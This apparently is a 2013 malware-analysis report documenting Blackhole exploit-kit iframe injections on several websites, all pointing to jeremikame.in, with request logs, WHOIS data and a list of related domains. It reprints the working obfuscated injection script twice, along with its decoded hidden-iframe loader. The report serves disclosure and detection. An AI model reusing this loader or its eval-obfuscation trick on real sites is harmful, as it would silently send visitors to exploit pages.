- # ---------------------------------------------
- #MalwareMustDie! @unixfreaxjp ~]$ date
- # Wed Mar 27 15:15:53 JST 2013
- #
- # Report of:
- # The dangerous malware infector (BHEK2) IP: 174.122.39.251
- # This will come back for sure.. beware!
- # ---------------------------------------------
- // These infections all lead to "jeremikame.in" on 174.122.39.251
- // jeremikame.in was "handled".
- h00p://www.pulplit.com/books/book-review-the-price-of-inequality-how-todays-divided-society.html
- h00p://paikia.com/brand/google/201005-google-adsense-secret-number-revealed.html
- h00p://bestwomenshikingbootsreviews.com/index.html
- h00p://thebestcampingtentsreviews.com/category/uncategorized/feed
- :
- : and so on.. and so on...
- // PoC? Here↓
- // CASE #1
- --2013-03-27 14:21:56-- h00p://www.pulplit.com/books/book-review-the-price-of-inequality-how-todays-divided-society.html
- Resolving www.pulplit.com... seconds 0.00, 66.147.240.159
- Caching www.pulplit.com => 66.147.240.159
- Connecting to www.pulplit.com|66.147.240.159|:80... seconds 0.00, connected.
- :
- GET /books/book-review-the-price-of-inequality-how-todays-divided-society.html h00p/1.0
- Referer: h00p://www.google.com/search?q=pulpit
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Host: www.pulplit.com
- Connection: keep-alive
- Keep-Alive: 300
- Accept-Language: en-us,en;q=0.5
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- h00p request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Date: Wed, 27 Mar 2013 05:21:45 GMT
- Server: Apache
- X-Pingback: h00p://www.pulplit.com/xmlrpc.php
- Link: <h00p://www.pulplit.com/?p=155989>; rel=shortlink
- Vary: Accept-Encoding
- Connection: close
- Content-Type: text/html; charset=UTF-8
- X-Pad: avoid browser bug
- 200 OK
- Length: unspecified [text/html]
- Saving to: `book-review-the-price-of-inequality-how-todays-divided-society.html'
- 2013-03-27 14:22:00 (57.2 KB/s) - `book-review-the-price-of-inequality-how-todays-divided-society.html' saved [28540]
- // injected iframer:
- :
- </body>
- <!-- Analyst annotation: the injection sits AFTER the page's own </html>, as two
-      identical <script> elements. Inside each: c=2, so `new c.prototype` throws
-      (a Number has no .prototype to construct), which makes the catch branch the
-      real entry point. The catch splits one long 'i'-separated list of signed
-      integers, adds 38 to each of the 579 entries (r.fromCharCode(38+1*w[j]))
-      to rebuild the source text, and executes it through window["e"+"v"+"al"],
-      i.e. eval assembled from fragments so a literal match on "eval" misses it.
-      The rebuilt text is the if/else + iframer() listing under "decode" below.
-      The try{new x.prototype}catch shape is the "prototype catch" structure
-      that the urlQuery signature in CASE #3 and CASE #4 reports. -->
- </html><script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split('i');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;579!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script><script>c=2;i=c-2;if(window.document)try{new 
c.prototype}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split('i');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;579!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script>
- // decoded:
- // Decoded loader body (CASE #1): the text the obfuscated <script> above rebuilds
- // and hands to eval. If a <body> element already exists, iframer() appends the
- // iframe through DOM calls; otherwise the same hidden 10x10 iframe is written
- // straight into the document with document.write(). Both paths fetch
- // jeremikame.in/ts/in.cgi?test, the host this report ties to 174.122.39.251.
- // "h00p" is the report author's defanging; the decoded bytes spell "http".
- if (document.getElementsByTagName('body')[0]){
- iframer();
- }
- else {
- document.write("
- <iframe src='h00p://jeremikame.in/ts/in.cgi?test' width='10' height='10' style='visibility
- :hidden;position:absolute;left:0;top:0;'></iframe>");
- }
- // iframer(): DOM-built variant of the same injection. Creates an <iframe>
- // whose src is jeremikame.in/ts/in.cgi?test (h00p = author's defang of http),
- // makes it invisible (visibility:hidden, position:absolute at 0,0, 10x10) and
- // appends it to <body>, so the landing page is fetched with nothing on screen.
- // Takes no parameters and returns nothing; its only effect is the appended element.
- // Detection cue: a hidden, absolutely positioned 10x10 iframe appended to <body>
- // by a <script> that appears after the page's closing </html>.
- function iframer(){
- var f = document.createElement('iframe');
- f.setAttribute('src', 'h00p://jeremikame.in/ts/in.cgi?test');
- f.style.visibility = 'hidden';
- f.style.position = 'absolute';
- f.style.left = '0';
- f.style.top = '0';
- f.setAttribute('width', '10');
- f.setAttribute('height', '10');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
- // CASE: #2
- --2013-03-27 14:55:13-- h00p://paikia.com/brand/google/201005-google-adsense-secret-number-revealed.html
- Resolving paikia.com... seconds 0.00, 108.162.196.189, 108.162.197.189
- Caching paikia.com => 108.162.196.189 108.162.197.189
- Connecting to paikia.com|108.162.196.189|:80... seconds 0.00, connected.
- :
- GET /brand/google/201005-google-adsense-secret-number-revealed.html h00p/1.0
- Referer: h00p://www.google.com/search?q=pulpit
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Host: paikia.com
- Connection: keep-alive
- Keep-Alive: 300
- Accept-Language: en-us,en;q=0.5
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- h00p request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Server: cloudflare-nginx
- Date: Wed, 27 Mar 2013 05:55:01 GMT
- Content-Type: text/html
- Connection: close
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `201005-google-adsense-secret-number-revealed.html'
- 2013-03-27 14:55:14 (4.60 KB/s) - `201005-google-adsense-secret-number-revealed.html' saved [3113]
- // injected iframer:
- <!-- Analyst annotation: the same two-copy loader as in CASE #1 (same 'i'-separated
-      integer list, same +38 per entry, same 579-iteration loop, same fragmented
-      window["e"+"v"+"al"] call), this time found in a page served behind Cloudflare
-      (see the Server header above), i.e. the injection lives in the origin's content.
-      It decodes to the same hidden-iframe iframer() listed below. -->
- <script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split('i');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;579!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script><script>c=2;i=c-2;if(window.document)try{new 
c.prototype}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i68i63i76i63i71i67i69i59i71i63i8i67i72i9i78i77i9i67i72i8i61i65i67i25i78i63i77i78i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split('i');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;579!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script>
- // decoded:
- :
- // Decoded iframer() from CASE #2, identical to the CASE #1 decode: builds a
- // hidden 10x10 <iframe> (visibility:hidden, position:absolute at 0,0) whose
- // src is jeremikame.in/ts/in.cgi?test and appends it to <body>.
- // This excerpt is truncated in the report: the leading if/else and the closing
- // brace of iframer() are not shown here; the full decode is under CASE #1.
- function iframer(){
- var f = document.createElement('iframe');
- f.setAttribute('src', 'h00p://jeremikame.in/ts/in.cgi?test');
- f.style.visibility = 'hidden';
- f.style.position = 'absolute';
- f.style.left = '0';
- f.style.top = '0';
- f.setAttribute('width', '10');
- f.setAttribute('height', '10');
- document.getElementsByTagName('body')[0].appendChild(f);
- // CASE #3
- Reff: http://urlquery.net/report.php?id=1044488
- URL h00p://bestwomenshikingbootsreviews.com/
- IP 174.122.39.251
- ASN AS21844 ThePlanet.com Internet Services, Inc.
- Loc [United States] United States
- Report completed 2013-02-19 22:39:55 CET
- urlQuery Alerts Detected malicious iframe injection
- EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
- // CASE #4
- Reff http://urlquery.net/report.php?id=991493
- URL h00p://thebestcampingtentsreviews.com/category/uncategorized/feed
- IP 174.122.39.251
- ASN AS21844 ThePlanet.com Internet Services, Inc.
- Location [United States] United States
- Report completed 2013-02-13 05:03:40 CET
- EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
- :
- // many more of these....
- // VERDICT?
- // It all led to JEREMIKAME.IN
- // You can search JEREMIKAME.IN in Google here: http://goo.gl/ezCKj
- // There was a Blackhole exploit kit running on 174.122.39.251
- // JEREMIKAME.IN domain registrant information:
- Domain ID:D5890496-AFIN
- Domain Name:JEREMIKAME.IN
- Created On:23-Feb-2012 11:39:17 UTC
- Last Updated On:10-Mar-2013 15:49:55 UTC
- Expiration Date:23-Feb-2014 11:39:17 UTC
- Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)
- Status:CLIENT TRANSFER PROHIBITED
- Status:PENDING DELETE RESTORABLE
- Status:HOLD
- Status:AUTORENEWPERIOD
- Status:REDEMPTIONPERIOD
- Registrant ID:DI_20971110
- Registrant Name:iekrs etnerl
- Registrant Organization:N/A
- Registrant Street1:234st apt 4/4
- Registrant Street2:
- Registrant Street3:
- Registrant City:New york
- Registrant State/Province:Ny
- Registrant Postal Code:10031
- Registrant Country:US
- Registrant Phone:+1.0459604334
- Registrant Phone Ext.:
- Registrant FAX:
- Registrant FAX Ext.:
- Registrant Email:lazeyko@mail.ru / <==== again, mail.ru being used by this moronz
- // The IP used by JEREMIKAME.IN
- Domain Name:JEREMIKAME.IN
- IP: 174.122.39.251
- NetRange: 174.120.0.0 - 174.123.255.255
- CIDR: 174.120.0.0/14
- OriginAS: AS36420, AS30315, AS13749, AS21844
- NetName: NETBLK-THEPLANET-BLK-16
- NetHandle: NET-174-120-0-0-1
- Parent: NET-174-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2009-03-23
- Updated: 2012-02-24
- OrgName: ThePlanet.com Internet Services, Inc.
- OrgId: TPCM
- Address: 315 Capitol
- Address: Suite 205
- City: Houston
- StateProv: TX
- PostalCode: 77002
- Country: US
- RegDate: 1999-08-31
- Updated: 2010-10-13
- OrgAbuseHandle: ABUSE271-ARIN
- OrgAbuseName: The Planet Abuse
- OrgAbusePhone: +1-281-714-3560
- OrgAbuseEmail: abuse@theplanet.com
- // Domains with a history of spam & malvertising:
- // all under 174.122.39.251
- 0pen0ffice-version10.com
- 0pen0ffice2024.com
- 12000shedplans.info
- africasolsafaris.com
- attractheranywhere.com
- becomeanursehq.com
- bestdealsonqualityproducts.com
- bestellipticaltrainersreviews.net
- besthandheldgpsreviews.com
- bestofofflinegold.com
- bestsellingbooklist.org
- bestwaystoloseweightreviews.com
- bestwomensbootsreviews.com
- bestwomenshikingbootsreviews.com
- bestyogamatsreviews.com
- betterweddingwebsites.com
- bewerbungen-neue.com
- bewerbungen-officevorlagen.com
- bgentsblog.com
- canonelph300hs.com
- cashflowforlife.ca
- catcosta.info
- cateringbusinesssuccess.com
- catlitterhouses.com
- cellphonespyingtool.com
- cityvillehelpguide.net
- cwcweb.org
- danenephillips.com
- daveiago.com
- digitaldownload4u.com
- earth-viewer360.com
- earthviewtool.com
- ebestwaytoloseweight.org
- eliteweightlossplan.com
- eliteweightlossplan.net
- equityplusrealestate.com
- etycoonblog.org
- everythingvacuumcleaners.myhitechstore.com
- ezdoityourselfsolarpanels.com
- fb.27.7aae.static.theplanet.com
- flashhplayeer-version10.com
- flight-games.org
- formulare-neue.com
- formulare-officevorlagen.com
- geekdgraphics.com
- globaljobagents.com
- gratuit-live.com
- hopeorphanageschool.com
- howtodealwithjealousy.net
- indytresdias.com
- intheblainearea.com
- intheminneapolisarea.com
- ivf-costs.info
- iwanttoworkwithjon.com
- katinababysales.com
- kipperscoffeeshop.com
- klalperspectives.org
- kohlipehotel.com
- kohsamethotel.org
- kristincagna.com
- latest-skypeeversion.com
- ledetservices.com
- mobilebenztech.com
- mp3remixer.com
- my-flashpiayyer10.com
- myskyppe-versionen4.com
- neu-offcetool.com
- neu-open0ffceversion.com
- neu-versionopen0ffice.com
- newbabyproductreview.com
- newimtips.com
- nokiaseries.net
- ns2.rntg.info
- ns2.skypeformac.info
- ns2.uclabruinsrunningshoes.info
- offlineblueprint.net
- offlinesuccesspuzzle.com
- onebadasshydrostream.info
- open0fficeneu.com
- outdoorgrills.myhitechstore.com
- paramedictraininghq.com
- photobamf.com
- popularvideosnow.com
- prosperityrealestatefund.com
- sanjotexas.com
- schoolcounselortoday.com
- siamniramitshow.com
- slowcookers.myhitechstore.com
- tangideals.com
- telephonereverselookups.com
- thepostinglist.com
- theradioshop.net
- travelingaffiliates.com
- twelvedisiples-jesus.com
- winchildcustodyinfo.com
- www.allali.net
- www.appdevsecretsonline.info
- www.localflipformula2.com
- www.mobi11.com
- www.mobi11.net
- www.nokiaseries.net
- zachawesome.com
- -----
- #MalwareMustDie!